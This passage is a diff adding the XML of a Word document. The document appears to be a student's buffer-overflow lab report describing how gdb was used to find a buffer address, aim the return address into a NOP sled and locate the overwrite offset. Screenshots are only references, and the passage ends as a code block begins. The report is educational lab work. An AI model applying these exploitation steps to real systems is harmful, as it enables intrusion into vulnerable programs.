+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="699EAB15" wp14:editId="502E63CD">
+            <wp:extent cx="5274310" cy="1700530"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="11" name="图片 11"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 3"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="1700530"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">To avoid </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>segmentation</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> error, I set a breakpoint at line 9 and then run it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A535A04" wp14:editId="53BEE70B">
+            <wp:extent cx="5274310" cy="694690"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="12" name="图片 12"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 4"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="694690"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>o</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> I have the address of buffer (0xbffff0d8) and obviously the buffer array should be </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>blank</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> at the beginning of line 9.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A87771E" wp14:editId="2A73AAAE">
+            <wp:extent cx="5274310" cy="925830"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
+            <wp:docPr id="13" name="图片 13"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="925830"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A5AA7EB" wp14:editId="22E89A6B">
+            <wp:extent cx="4934639" cy="733527"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="14" name="图片 14"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4934639" cy="733527"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6359F137" wp14:editId="600FE637">
+            <wp:extent cx="5274310" cy="577215"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="15" name="图片 15"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="577215"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>nd in the next line it will be filled with data from str, anyway.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Then I first tested </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>0xbffff0d8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> as the shellcode address, but I failed until I added 128 to it</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (I still don’t know why)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Then I realized there should be </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> address range for</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> it, because here are so many NOPs in the buffer, and it is only necessary to reach any middle NOP it will be good.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">lso, I get the maximum value of the address by </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>gdb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AB24185" wp14:editId="302577FD">
+            <wp:extent cx="5274310" cy="3229610"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
+            <wp:docPr id="16" name="图片 16"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 5"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId23">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="3229610"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>From the screenshot above, I know it should be no more than 0xbffff2c5, so the range is about from 0xbffff158 to 0xbffff2c5.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>2)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> To find </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">where should </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>the address</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> be put in the buffer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, at the beginning I located it almost everywhere, and luckily, it worked.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76109A83" wp14:editId="71665920">
+            <wp:extent cx="2953206" cy="1795942"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="17" name="图片 17"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 6"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId24">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2955823" cy="1797534"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>hen I tested each location one by one and found the only effective one.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>long</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
